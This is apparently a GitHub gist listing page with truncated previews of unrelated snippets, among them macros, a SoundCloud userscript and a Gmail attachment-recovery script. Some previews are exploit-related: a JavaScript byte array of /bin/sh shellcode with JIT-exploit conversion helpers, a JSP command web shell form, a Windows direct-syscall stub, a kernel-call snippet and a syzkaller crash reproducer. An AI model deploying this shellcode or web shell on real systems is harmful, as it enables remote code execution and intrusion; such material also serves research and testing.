This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| acmnokigkgihogfbeooklgemindnbine is down | |
| apgohnlmnmkblgfplgnlmkjcpocgfomp is down | |
| apjnadhmhgdobcdanndaphcpmnjbnfng is down | |
| bahkljhhdeciiaodlkppoonappfnheoi is down | |
| bannaglhmenocdjcmlkhkcciioaepfpj is down | |
| bgffinjklipdhacmidehoncomokcmjmh is down | |
| bifdhahddjbdbjmiekcnmeiffabcfjgh is down | |
| bjpknhldlbknoidifkjnnkpginjgkgnm is down | |
| blngdeeenccpfjbkolalandfmiinhkak is down | |
| ccdfhjebekpopcelcfkpgagbehppkadi is down |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #pragma once | |
| #define CONCAT_DETAIL(l, r) l##r | |
| #define CONCAT(l, r) CONCAT_DETAIL(l, r) | |
| #define COUNT_N(_0, _1, _2, _3, _4, _5, _6, _7, _8, _9, _10, N, ...) N | |
| #define COUNT_M(...) EXPAND(COUNT_N( __VA_ARGS__, 10, 9, 8, 7, 6, 5, 4, 3, 2, 1, 0)) | |
| #define VA_NARGS(...) CALL(COUNT_M,(, __VA_ARGS__)) | |
| #define CALL(X,Y) X Y | |
| #define EXPAND(...) __VA_ARGS__ | |
| #define CALL_N(N, X, V) CALL(CONCAT(N,X),(V)) |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // make syscalls from their ordinals | |
| #include <Windows.h> | |
| #include <stdio.h> | |
| #include <cstdint> | |
| #include <vector> | |
| struct syscall_bytes { | |
| uint8_t | |
| header[0x4] , |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| let sc = [106,104,72,184,47,98,105,110,47,47,47,115,80,72,137,231,104,114,105,1,1,129,52,36,1,1,1,1,49,246,86,106,8,94,72,1,230,86,72,137,230,49,210,106,59,88,15,5]; | |
| let conva = new ArrayBuffer(8) | |
| let convi = new Uint32Array(conva); | |
| let convf = new Float64Array(conva); | |
| function i2f(i) { | |
| convi[0] = i%0x100000000; | |
| convi[1] = i/0x100000000; | |
| return convf[0]; |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <html> | |
| <meta content="text/html;charset=utf-8" http-equiv="Content-Type"> | |
| <meta content="utf-8" http-equiv="encoding"> | |
| <body onload="CreateListReaderIframe()"> | |
| <script> | |
| function CreateListReaderIframe() { | |
| var ifr = document.createElement("iframe"); |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <iostream> | |
| #include <conio.h> | |
| #include <Windows.h> | |
| typedef LONG(WINAPI *pNtUserCreateActivationObject)( | |
| HWND hwnd, | |
| ULONG_PTR Irrelevant1, | |
| LUID *Luid); | |
| HCRYPTPROV g_hCryptoProvider = NULL; |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <%@ page import="java.util.*,java.io.*"%> | |
| <% | |
| %> | |
| <HTML><BODY> | |
| Commands with JSP | |
| <FORM METHOD="GET" NAME="myform" ACTION=""> | |
| <INPUT TYPE="text" NAME="cmd"> | |
| <INPUT TYPE="submit" VALUE="Send"> | |
| </FORM> | |
| <pre> |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // autogenerated by syzkaller (http://github.com/google/syzkaller) | |
| #define _GNU_SOURCE | |
| #include <sys/ioctl.h> | |
| #include <sys/stat.h> | |
| #include <sys/syscall.h> | |
| #include <sys/time.h> | |
| #include <sys/types.h> | |
| #include <sys/wait.h> | |
| #include <stddef.h> | |
| #include <stdint.h> |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // ==UserScript== | |
| // @name SoundCloud: Download Button | |
| // @namespace e7fc358c1e5cc159ce3f327246807caa | |
| // @include https://soundcloud.com/* | |
| // @version 1.1 | |
| // @grant none | |
| // @run-at document-idle | |
| // ==/UserScript== | |
| (function() { |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python3 | |
| # Get your files that Gmail block. Warning message: | |
| # "Anti-virus warning - 1 attachment contains a virus or blocked file. Downloading this attachment is disabled." | |
| # Based on: https://spapas.github.io/2014/10/23/retrieve-gmail-blocked-attachments/ | |
| # Instructions: | |
| # Go to your emails, click the arrow button in the top right, "Show original", then "Download Original". | |
| # Move the files to the same directory as this program, then run it. | |
| import sys |
NewerOlder